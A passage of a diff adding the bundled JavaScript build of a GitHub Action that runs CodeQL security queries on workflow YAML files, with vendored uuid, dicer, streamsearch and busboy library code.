and value, Per 4.3 + // Future: Use spread syntax when supported on all platforms, e.g. `bytes = + // hashfunc([...namespace, ... value])` + + + let bytes = new Uint8Array(16 + value.length); + bytes.set(namespace); + bytes.set(value, namespace.length); + bytes = hashfunc(bytes); + bytes[6] = bytes[6] & 0x0f | version; + bytes[8] = bytes[8] & 0x3f | 0x80; + + if (buf) { + offset = offset || 0; + + for (let i = 0; i < 16; ++i) { + buf[offset + i] = bytes[i]; + } + + return buf; + } + + return (0, _stringify.default)(bytes); + } // Function#name is not settable on some platforms (#270) + + + try { + generateUUID.name = name; // eslint-disable-next-line no-empty + } catch (err) {} // For CommonJS default export support + + + generateUUID.DNS = DNS; + generateUUID.URL = URL; + return generateUUID; +} + +/***/ }), + +/***/ 5122: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _rng = _interopRequireDefault(__nccwpck_require__(807)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function v4(options, buf, offset) { + options = options || {}; + + const rnds = options.random || (options.rng || _rng.default)(); // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` + + + rnds[6] = rnds[6] & 0x0f | 0x40; + rnds[8] = rnds[8] & 0x3f | 0x80; // Copy bytes to buffer, if provided + + if (buf) { + offset = offset || 0; + + for (let i = 0; i < 16; ++i) { + buf[offset + i] = rnds[i]; + } + + return buf; + } + + return (0, _stringify.default)(rnds); +} + +var _default = v4; +exports["default"] = _default; + +/***/ }), + +/***/ 9120: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _v = _interopRequireDefault(__nccwpck_require__(5998)); + +var _sha = _interopRequireDefault(__nccwpck_require__(5274)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +const v5 = (0, _v.default)('v5', 0x50, _sha.default); +var _default = v5; +exports["default"] = _default; + +/***/ }), + +/***/ 6900: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _regex = _interopRequireDefault(__nccwpck_require__(814)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function validate(uuid) { + return typeof uuid === 'string' && _regex.default.test(uuid); +} + +var _default = validate; +exports["default"] = _default; + +/***/ }), + +/***/ 1595: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function version(uuid) { + if (!(0, _validate.default)(uuid)) { + throw TypeError('Invalid UUID'); + } + + return parseInt(uuid.substr(14, 1), 16); +} + +var _default = version; +exports["default"] = _default; + +/***/ }), + +/***/ 950: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +const fs = __importStar(__nccwpck_require__(7147)); +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const toolcache = __importStar(__nccwpck_require__(7784)); +const toolrunner = __importStar(__nccwpck_require__(8159)); +async function newCodeQL() { + return { + language: "yaml", + path: await findCodeQL(), + pack: "GitHubSecurityLab/actions-queries", + suite: "codeql-suites/actions-code-scanning.qls", + source_root: core.getInput("source-root"), + output: core.getInput("sarif"), + }; +} +exports.newCodeQL = newCodeQL; +async function runCommand(config, args) { + var bin = path.join(config.path, "codeql"); + let output = ""; + var options = { + listeners: { + stdout: (data) => { + output += data.toString(); + }, + }, + }; + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + return output.trim(); +} +exports.runCommand = runCommand; +async function runCommandJson(config, args) { + return JSON.parse(await runCommand(config, args)); +} +exports.runCommandJson = runCommandJson; +async function findCodeQL() { + // check if codeql is in the toolcache + var codeqlPath = await findCodeQlInToolcache(); + if (codeqlPath !== undefined) { + return codeqlPath; + } + // default to the codeql in the path + return "codeql"; +} +async function findCodeQlInToolcache() { + const candidates = toolcache + .findAllVersions("CodeQL") + .map((version) => ({ + folder: toolcache.find("CodeQL", version), + version, + })) + .filter(({ folder }) => fs.existsSync(path.join(folder, "pinned-version"))); + if (candidates.length === 1) { + const candidate = candidates[0]; + core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); + core.debug(`CodeQL toolcache version: '${candidate.version}'.`); + return path.join(candidate.folder, "codeql"); + } + core.warning(`No CodeQL tools found in toolcache.`); + return undefined; +} +async function downloadPack(codeql) { + try { + await runCommand(codeql, ["pack", "download", codeql.pack]); + return true; + } + catch (error) { + core.warning("Failed to download pack from GitHub..."); + } + return false; +} +exports.downloadPack = downloadPack; +async function codeqlDatabaseCreate(codeql) { + // get runner temp directory for database + var temp = process.env["RUNNER_TEMP"]; + if (temp === undefined) { + temp = "/tmp"; + } + var database_path = path.join(temp, "codeql-actions-db"); + var source_root = codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + await runCommand(codeql, [ + "database", + "create", + "--language", + codeql.language, + "--source-root", + source_root, + database_path, + ]); + return database_path; +} +exports.codeqlDatabaseCreate = codeqlDatabaseCreate; +async function codeqlDatabaseAnalyze(codeql, database_path) { + var codeql_output = codeql.output || "codeql-actions.sarif"; + var cmd = [ + "database", + "analyze", + "--format", + "sarif-latest", + "--sarif-add-query-help", + "--output", + codeql_output, + ]; + // remote pack or local pack + if (codeql.pack.startsWith("GitHubSecurityLab/")) { + var suite = codeql.pack + ":" + codeql.suite; + } + else { + // assume path + var suite = path.join(codeql.pack, codeql.suite); + cmd.push("--search-path", codeql.pack); + } + cmd.push(database_path, suite); + await runCommand(codeql, cmd); + return codeql_output; +} +exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; + + +/***/ }), + +/***/ 6144: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.run = void 0; +const path = __importStar(__nccwpck_require__(1017)); +const core = __importStar(__nccwpck_require__(2186)); +const cql = __importStar(__nccwpck_require__(950)); +/** + * The main function for the action. + * @returns {Promise} Resolves when the action is complete. + */ +async function run() { + try { + // set up codeql + var codeql = await cql.newCodeQL(); + core.debug(`CodeQL CLI found at '${codeql.path}'`); + await cql.runCommand(codeql, ["version", "--format", "terse"]); + // check yaml support + var languages = await cql.runCommandJson(codeql, [ + "resolve", + "languages", + "--format", + "json", + ]); + if (!languages.hasOwnProperty("yaml")) { + core.setFailed("CodeQL Yaml extractor not installed"); + throw new Error("CodeQL Yaml extractor not installed"); + } + // download pack + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } + else { + core.info(`Pack downloaded '${codeql.pack}'`); + } + core.info("Creating CodeQL database..."); + var database_path = await cql.codeqlDatabaseCreate(codeql); + core.info("Running CodeQL analysis..."); + var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); + core.info(`SARIF results: '${sarif}'`); + core.setOutput("sarif", sarif); + core.info("Finished CodeQL analysis"); + } + catch (error) { + // Fail the workflow run if an error occurs + if (error instanceof Error) + core.setFailed(error.message); + } +} +exports.run = run; +// eslint-disable-next-line @typescript-eslint/no-floating-promises +run(); + + +/***/ }), + +/***/ 9491: +/***/ ((module) => { + +"use strict"; +module.exports = require("assert"); + +/***/ }), + +/***/ 852: +/***/ ((module) => { + +"use strict"; +module.exports = require("async_hooks"); + +/***/ }), + +/***/ 4300: +/***/ ((module) => { + +"use strict"; +module.exports = require("buffer"); + +/***/ }), + +/***/ 2081: +/***/ ((module) => { + +"use strict"; +module.exports = require("child_process"); + +/***/ }), + +/***/ 6206: +/***/ ((module) => { + +"use strict"; +module.exports = require("console"); + +/***/ }), + +/***/ 6113: +/***/ ((module) => { + +"use strict"; +module.exports = require("crypto"); + +/***/ }), + +/***/ 7643: +/***/ ((module) => { + +"use strict"; +module.exports = require("diagnostics_channel"); + +/***/ }), + +/***/ 2361: +/***/ ((module) => { + +"use strict"; +module.exports = require("events"); + +/***/ }), + +/***/ 7147: +/***/ ((module) => { + +"use strict"; +module.exports = require("fs"); + +/***/ }), + +/***/ 3685: +/***/ ((module) => { + +"use strict"; +module.exports = require("http"); + +/***/ }), + +/***/ 5158: +/***/ ((module) => { + +"use strict"; +module.exports = require("http2"); + +/***/ }), + +/***/ 5687: +/***/ ((module) => { + +"use strict"; +module.exports = require("https"); + +/***/ }), + +/***/ 1808: +/***/ ((module) => { + +"use strict"; +module.exports = require("net"); + +/***/ }), + +/***/ 5673: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:events"); + +/***/ }), + +/***/ 4492: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:stream"); + +/***/ }), + +/***/ 7261: +/***/ ((module) => { + +"use strict"; +module.exports = require("node:util"); + +/***/ }), + +/***/ 2037: +/***/ ((module) => { + +"use strict"; +module.exports = require("os"); + +/***/ }), + +/***/ 1017: +/***/ ((module) => { + +"use strict"; +module.exports = require("path"); + +/***/ }), + +/***/ 4074: +/***/ ((module) => { + +"use strict"; +module.exports = require("perf_hooks"); + +/***/ }), + +/***/ 3477: +/***/ ((module) => { + +"use strict"; +module.exports = require("querystring"); + +/***/ }), + +/***/ 2781: +/***/ ((module) => { + +"use strict"; +module.exports = require("stream"); + +/***/ }), + +/***/ 5356: +/***/ ((module) => { + +"use strict"; +module.exports = require("stream/web"); + +/***/ }), + +/***/ 1576: +/***/ ((module) => { + +"use strict"; +module.exports = require("string_decoder"); + +/***/ }), + +/***/ 9512: +/***/ ((module) => { + +"use strict"; +module.exports = require("timers"); + +/***/ }), + +/***/ 4404: +/***/ ((module) => { + +"use strict"; +module.exports = require("tls"); + +/***/ }), + +/***/ 7310: +/***/ ((module) => { + +"use strict"; +module.exports = require("url"); + +/***/ }), + +/***/ 3837: +/***/ ((module) => { + +"use strict"; +module.exports = require("util"); + +/***/ }), + +/***/ 9830: +/***/ ((module) => { + +"use strict"; +module.exports = require("util/types"); + +/***/ }), + +/***/ 1267: +/***/ ((module) => { + +"use strict"; +module.exports = require("worker_threads"); + +/***/ }), + +/***/ 9796: +/***/ ((module) => { + +"use strict"; +module.exports = require("zlib"); + +/***/ }), + +/***/ 2960: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const WritableStream = (__nccwpck_require__(4492).Writable) +const inherits = (__nccwpck_require__(7261).inherits) + +const StreamSearch = __nccwpck_require__(1142) + +const PartStream = __nccwpck_require__(1620) +const HeaderParser = __nccwpck_require__(2032) + +const DASH = 45 +const B_ONEDASH = Buffer.from('-') +const B_CRLF = Buffer.from('\r\n') +const EMPTY_FN = function () {} + +function Dicer (cfg) { + if (!(this instanceof Dicer)) { return new Dicer(cfg) } + WritableStream.call(this, cfg) + + if (!cfg || (!cfg.headerFirst && typeof cfg.boundary !== 'string')) { throw new TypeError('Boundary required') } + + if (typeof cfg.boundary === 'string') { this.setBoundary(cfg.boundary) } else { this._bparser = undefined } + + this._headerFirst = cfg.headerFirst + + this._dashes = 0 + this._parts = 0 + this._finished = false + this._realFinish = false + this._isPreamble = true + this._justMatched = false + this._firstWrite = true + this._inHeader = true + this._part = undefined + this._cb = undefined + this._ignoreData = false + this._partOpts = { highWaterMark: cfg.partHwm } + this._pause = false + + const self = this + this._hparser = new HeaderParser(cfg) + this._hparser.on('header', function (header) { + self._inHeader = false + self._part.emit('header', header) + }) +} +inherits(Dicer, WritableStream) + +Dicer.prototype.emit = function (ev) { + if (ev === 'finish' && !this._realFinish) { + if (!this._finished) { + const self = this + process.nextTick(function () { + self.emit('error', new Error('Unexpected end of multipart data')) + if (self._part && !self._ignoreData) { + const type = (self._isPreamble ? 'Preamble' : 'Part') + self._part.emit('error', new Error(type + ' terminated early due to unexpected end of multipart data')) + self._part.push(null) + process.nextTick(function () { + self._realFinish = true + self.emit('finish') + self._realFinish = false + }) + return + } + self._realFinish = true + self.emit('finish') + self._realFinish = false + }) + } + } else { WritableStream.prototype.emit.apply(this, arguments) } +} + +Dicer.prototype._write = function (data, encoding, cb) { + // ignore unexpected data (e.g. extra trailer data after finished) + if (!this._hparser && !this._bparser) { return cb() } + + if (this._headerFirst && this._isPreamble) { + if (!this._part) { + this._part = new PartStream(this._partOpts) + if (this._events.preamble) { this.emit('preamble', this._part) } else { this._ignore() } + } + const r = this._hparser.push(data) + if (!this._inHeader && r !== undefined && r < data.length) { data = data.slice(r) } else { return cb() } + } + + // allows for "easier" testing + if (this._firstWrite) { + this._bparser.push(B_CRLF) + this._firstWrite = false + } + + this._bparser.push(data) + + if (this._pause) { this._cb = cb } else { cb() } +} + +Dicer.prototype.reset = function () { + this._part = undefined + this._bparser = undefined + this._hparser = undefined +} + +Dicer.prototype.setBoundary = function (boundary) { + const self = this + this._bparser = new StreamSearch('\r\n--' + boundary) + this._bparser.on('info', function (isMatch, data, start, end) { + self._oninfo(isMatch, data, start, end) + }) +} + +Dicer.prototype._ignore = function () { + if (this._part && !this._ignoreData) { + this._ignoreData = true + this._part.on('error', EMPTY_FN) + // we must perform some kind of read on the stream even though we are + // ignoring the data, otherwise node's Readable stream will not emit 'end' + // after pushing null to the stream + this._part.resume() + } +} + +Dicer.prototype._oninfo = function (isMatch, data, start, end) { + let buf; const self = this; let i = 0; let r; let shouldWriteMore = true + + if (!this._part && this._justMatched && data) { + while (this._dashes < 2 && (start + i) < end) { + if (data[start + i] === DASH) { + ++i + ++this._dashes + } else { + if (this._dashes) { buf = B_ONEDASH } + this._dashes = 0 + break + } + } + if (this._dashes === 2) { + if ((start + i) < end && this._events.trailer) { this.emit('trailer', data.slice(start + i, end)) } + this.reset() + this._finished = true + // no more parts will be added + if (self._parts === 0) { + self._realFinish = true + self.emit('finish') + self._realFinish = false + } + } + if (this._dashes) { return } + } + if (this._justMatched) { this._justMatched = false } + if (!this._part) { + this._part = new PartStream(this._partOpts) + this._part._read = function (n) { + self._unpause() + } + if (this._isPreamble && this._events.preamble) { this.emit('preamble', this._part) } else if (this._isPreamble !== true && this._events.part) { this.emit('part', this._part) } else { this._ignore() } + if (!this._isPreamble) { this._inHeader = true } + } + if (data && start < end && !this._ignoreData) { + if (this._isPreamble || !this._inHeader) { + if (buf) { shouldWriteMore = this._part.push(buf) } + shouldWriteMore = this._part.push(data.slice(start, end)) + if (!shouldWriteMore) { this._pause = true } + } else if (!this._isPreamble && this._inHeader) { + if (buf) { this._hparser.push(buf) } + r = this._hparser.push(data.slice(start, end)) + if (!this._inHeader && r !== undefined && r < end) { this._oninfo(false, data, start + r, end) } + } + } + if (isMatch) { + this._hparser.reset() + if (this._isPreamble) { this._isPreamble = false } else { + if (start !== end) { + ++this._parts + this._part.on('end', function () { + if (--self._parts === 0) { + if (self._finished) { + self._realFinish = true + self.emit('finish') + self._realFinish = false + } else { + self._unpause() + } + } + }) + } + } + this._part.push(null) + this._part = undefined + this._ignoreData = false + this._justMatched = true + this._dashes = 0 + } +} + +Dicer.prototype._unpause = function () { + if (!this._pause) { return } + + this._pause = false + if (this._cb) { + const cb = this._cb + this._cb = undefined + cb() + } +} + +module.exports = Dicer + + +/***/ }), + +/***/ 2032: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const EventEmitter = (__nccwpck_require__(5673).EventEmitter) +const inherits = (__nccwpck_require__(7261).inherits) +const getLimit = __nccwpck_require__(1467) + +const StreamSearch = __nccwpck_require__(1142) + +const B_DCRLF = Buffer.from('\r\n\r\n') +const RE_CRLF = /\r\n/g +const RE_HDR = /^([^:]+):[ \t]?([\x00-\xFF]+)?$/ // eslint-disable-line no-control-regex + +function HeaderParser (cfg) { + EventEmitter.call(this) + + cfg = cfg || {} + const self = this + this.nread = 0 + this.maxed = false + this.npairs = 0 + this.maxHeaderPairs = getLimit(cfg, 'maxHeaderPairs', 2000) + this.maxHeaderSize = getLimit(cfg, 'maxHeaderSize', 80 * 1024) + this.buffer = '' + this.header = {} + this.finished = false + this.ss = new StreamSearch(B_DCRLF) + this.ss.on('info', function (isMatch, data, start, end) { + if (data && !self.maxed) { + if (self.nread + end - start >= self.maxHeaderSize) { + end = self.maxHeaderSize - self.nread + start + self.nread = self.maxHeaderSize + self.maxed = true + } else { self.nread += (end - start) } + + self.buffer += data.toString('binary', start, end) + } + if (isMatch) { self._finish() } + }) +} +inherits(HeaderParser, EventEmitter) + +HeaderParser.prototype.push = function (data) { + const r = this.ss.push(data) + if (this.finished) { return r } +} + +HeaderParser.prototype.reset = function () { + this.finished = false + this.buffer = '' + this.header = {} + this.ss.reset() +} + +HeaderParser.prototype._finish = function () { + if (this.buffer) { this._parseHeader() } + this.ss.matches = this.ss.maxMatches + const header = this.header + this.header = {} + this.buffer = '' + this.finished = true + this.nread = this.npairs = 0 + this.maxed = false + this.emit('header', header) +} + +HeaderParser.prototype._parseHeader = function () { + if (this.npairs === this.maxHeaderPairs) { return } + + const lines = this.buffer.split(RE_CRLF) + const len = lines.length + let m, h + + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + if (lines[i].length === 0) { continue } + if (lines[i][0] === '\t' || lines[i][0] === ' ') { + // folded header content + // RFC2822 says to just remove the CRLF and not the whitespace following + // it, so we follow the RFC and include the leading whitespace ... + if (h) { + this.header[h][this.header[h].length - 1] += lines[i] + continue + } + } + + const posColon = lines[i].indexOf(':') + if ( + posColon === -1 || + posColon === 0 + ) { + return + } + m = RE_HDR.exec(lines[i]) + h = m[1].toLowerCase() + this.header[h] = this.header[h] || [] + this.header[h].push((m[2] || '')) + if (++this.npairs === this.maxHeaderPairs) { break } + } +} + +module.exports = HeaderParser + + +/***/ }), + +/***/ 1620: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const inherits = (__nccwpck_require__(7261).inherits) +const ReadableStream = (__nccwpck_require__(4492).Readable) + +function PartStream (opts) { + ReadableStream.call(this, opts) +} +inherits(PartStream, ReadableStream) + +PartStream.prototype._read = function (n) {} + +module.exports = PartStream + + +/***/ }), + +/***/ 1142: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +/** + * Copyright Brian White. All rights reserved. + * + * @see https://github.com/mscdex/streamsearch + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to + * deal in the Software without restriction, including without limitation the + * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + * sell copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + * IN THE SOFTWARE. + * + * Based heavily on the Streaming Boyer-Moore-Horspool C++ implementation + * by Hongli Lai at: https://github.com/FooBarWidget/boyer-moore-horspool + */ +const EventEmitter = (__nccwpck_require__(5673).EventEmitter) +const inherits = (__nccwpck_require__(7261).inherits) + +function SBMH (needle) { + if (typeof needle === 'string') { + needle = Buffer.from(needle) + } + + if (!Buffer.isBuffer(needle)) { + throw new TypeError('The needle has to be a String or a Buffer.') + } + + const needleLength = needle.length + + if (needleLength === 0) { + throw new Error('The needle cannot be an empty String/Buffer.') + } + + if (needleLength > 256) { + throw new Error('The needle cannot have a length bigger than 256.') + } + + this.maxMatches = Infinity + this.matches = 0 + + this._occ = new Array(256) + .fill(needleLength) // Initialize occurrence table. + this._lookbehind_size = 0 + this._needle = needle + this._bufpos = 0 + + this._lookbehind = Buffer.alloc(needleLength) + + // Populate occurrence table with analysis of the needle, + // ignoring last letter. + for (var i = 0; i < needleLength - 1; ++i) { // eslint-disable-line no-var + this._occ[needle[i]] = needleLength - 1 - i + } +} +inherits(SBMH, EventEmitter) + +SBMH.prototype.reset = function () { + this._lookbehind_size = 0 + this.matches = 0 + this._bufpos = 0 +} + +SBMH.prototype.push = function (chunk, pos) { + if (!Buffer.isBuffer(chunk)) { + chunk = Buffer.from(chunk, 'binary') + } + const chlen = chunk.length + this._bufpos = pos || 0 + let r + while (r !== chlen && this.matches < this.maxMatches) { r = this._sbmh_feed(chunk) } + return r +} + +SBMH.prototype._sbmh_feed = function (data) { + const len = data.length + const needle = this._needle + const needleLength = needle.length + const lastNeedleChar = needle[needleLength - 1] + + // Positive: points to a position in `data` + // pos == 3 points to data[3] + // Negative: points to a position in the lookbehind buffer + // pos == -2 points to lookbehind[lookbehind_size - 2] + let pos = -this._lookbehind_size + let ch + + if (pos < 0) { + // Lookbehind buffer is not empty. Perform Boyer-Moore-Horspool + // search with character lookup code that considers both the + // lookbehind buffer and the current round's haystack data. + // + // Loop until + // there is a match. + // or until + // we've moved past the position that requires the + // lookbehind buffer. In this case we switch to the + // optimized loop. + // or until + // the character to look at lies outside the haystack. + while (pos < 0 && pos <= len - needleLength) { + ch = this._sbmh_lookup_char(data, pos + needleLength - 1) + + if ( + ch === lastNeedleChar && + this._sbmh_memcmp(data, pos, needleLength - 1) + ) { + this._lookbehind_size = 0 + ++this.matches + this.emit('info', true) + + return (this._bufpos = pos + needleLength) + } + pos += this._occ[ch] + } + + // No match. + + if (pos < 0) { + // There's too few data for Boyer-Moore-Horspool to run, + // so let's use a different algorithm to skip as much as + // we can. + // Forward pos until + // the trailing part of lookbehind + data + // looks like the beginning of the needle + // or until + // pos == 0 + while (pos < 0 && !this._sbmh_memcmp(data, pos, len - pos)) { ++pos } + } + + if (pos >= 0) { + // Discard lookbehind buffer. + this.emit('info', false, this._lookbehind, 0, this._lookbehind_size) + this._lookbehind_size = 0 + } else { + // Cut off part of the lookbehind buffer that has + // been processed and append the entire haystack + // into it. + const bytesToCutOff = this._lookbehind_size + pos + if (bytesToCutOff > 0) { + // The cut off data is guaranteed not to contain the needle. + this.emit('info', false, this._lookbehind, 0, bytesToCutOff) + } + + this._lookbehind.copy(this._lookbehind, 0, bytesToCutOff, + this._lookbehind_size - bytesToCutOff) + this._lookbehind_size -= bytesToCutOff + + data.copy(this._lookbehind, this._lookbehind_size) + this._lookbehind_size += len + + this._bufpos = len + return len + } + } + + pos += (pos >= 0) * this._bufpos + + // Lookbehind buffer is now empty. We only need to check if the + // needle is in the haystack. + if (data.indexOf(needle, pos) !== -1) { + pos = data.indexOf(needle, pos) + ++this.matches + if (pos > 0) { this.emit('info', true, data, this._bufpos, pos) } else { this.emit('info', true) } + + return (this._bufpos = pos + needleLength) + } else { + pos = len - needleLength + } + + // There was no match. If there's trailing haystack data that we cannot + // match yet using the Boyer-Moore-Horspool algorithm (because the trailing + // data is less than the needle size) then match using a modified + // algorithm that starts matching from the beginning instead of the end. + // Whatever trailing data is left after running this algorithm is added to + // the lookbehind buffer. + while ( + pos < len && + ( + data[pos] !== needle[0] || + ( + (Buffer.compare( + data.subarray(pos, pos + len - pos), + needle.subarray(0, len - pos) + ) !== 0) + ) + ) + ) { + ++pos + } + if (pos < len) { + data.copy(this._lookbehind, 0, pos, pos + (len - pos)) + this._lookbehind_size = len - pos + } + + // Everything until pos is guaranteed not to contain needle data. + if (pos > 0) { this.emit('info', false, data, this._bufpos, pos < len ? pos : len) } + + this._bufpos = len + return len +} + +SBMH.prototype._sbmh_lookup_char = function (data, pos) { + return (pos < 0) + ? this._lookbehind[this._lookbehind_size + pos] + : data[pos] +} + +SBMH.prototype._sbmh_memcmp = function (data, pos, len) { + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + if (this._sbmh_lookup_char(data, pos + i) !== this._needle[i]) { return false } + } + return true +} + +module.exports = SBMH + + +/***/ }), + +/***/ 727: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const WritableStream = (__nccwpck_require__(4492).Writable) +const { inherits } = __nccwpck_require__(7261) +const Dicer = __nccwpck_require__(2960) + +const MultipartParser = __nccwpck_require__(2183) +const UrlencodedParser = __nccwpck_require__(8306) +const parseParams = __nccwpck_require__(1854) + +function Busboy (opts) { + if (!(this instanceof Busboy)) { return new Busboy(opts) } + + if (typeof opts !== 'object') { + throw new TypeError('Busboy expected an options-Object.') + } + if (typeof opts.headers !== 'object') { + throw new TypeError('Busboy expected an options-Object with headers-attribute.') + } + if (typeof opts.headers['content-type'] !== 'string') { + throw new TypeError('Missing Content-Type-header.') + } + + const { + headers, + ...streamOptions + } = opts + + this.opts = { + autoDestroy: false, + ...streamOptions + } + WritableStream.call(this, this.opts) + + this._done = false + this._parser = this.getParserByHeaders(headers) + this._finished = false +} +inherits(Busboy, WritableStream) + +Busboy.prototype.emit = function (ev) { + if (ev === 'finish') { + if (!this._done) { + this._parser?.end() + return + } else if (this._finished) { + return + } + this._finished = true + } + WritableStream.prototype.emit.apply(this, arguments) +} + +Busboy.prototype.getParserByHeaders = function (headers) { + const parsed = parseParams(headers['content-type']) + + const cfg = { + defCharset: this.opts.defCharset, + fileHwm: this.opts.fileHwm, + headers, + highWaterMark: this.opts.highWaterMark, + isPartAFile: this.opts.isPartAFile, + limits: this.opts.limits, + parsedConType: parsed, + preservePath: this.opts.preservePath + } + + if (MultipartParser.detect.test(parsed[0])) { + return new MultipartParser(this, cfg) + } + if (UrlencodedParser.detect.test(parsed[0])) { + return new UrlencodedParser(this, cfg) + } + throw new Error('Unsupported Content-Type.') +} + +Busboy.prototype._write = function (chunk, encoding, cb) { + this._parser.write(chunk, cb) +} + +module.exports = Busboy +module.exports["default"] = Busboy +module.exports.Busboy = Busboy + +module.exports.Dicer = Dicer + + +/***/ }), + +/***/ 2183: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +// TODO: +// * support 1 nested multipart level +// (see second multipart example here: +// http://www.w3.org/TR/html401/interact/forms.html#didx-multipartform-data) +// * support limits.fieldNameSize +// -- this will require modifications to utils.parseParams + +const { Readable } = __nccwpck_require__(4492) +const { inherits } = __nccwpck_require__(7261) + +const Dicer = __nccwpck_require__(2960) + +const parseParams = __nccwpck_require__(1854) +const decodeText = __nccwpck_require__(4619) +const basename = __nccwpck_require__(8647) +const getLimit = __nccwpck_require__(1467) + +const RE_BOUNDARY = /^boundary$/i +const RE_FIELD = /^form-data$/i +const RE_CHARSET = /^charset$/i +const RE_FILENAME = /^filename$/i +const RE_NAME = /^name$/i + +Multipart.detect = /^multipart\/form-data/i +function Multipart (boy, cfg) { + let i + let len + const self = this + let boundary + const limits = cfg.limits + const isPartAFile = cfg.isPartAFile || ((fieldName, contentType, fileName) => (contentType === 'application/octet-stream' || fileName !== undefined)) + const parsedConType = cfg.parsedConType || [] + const defCharset = cfg.defCharset || 'utf8' + const preservePath = cfg.preservePath + const fileOpts = { highWaterMark: cfg.fileHwm } + + for (i = 0, len = parsedConType.length; i < len; ++i) { + if (Array.isArray(parsedConType[i]) 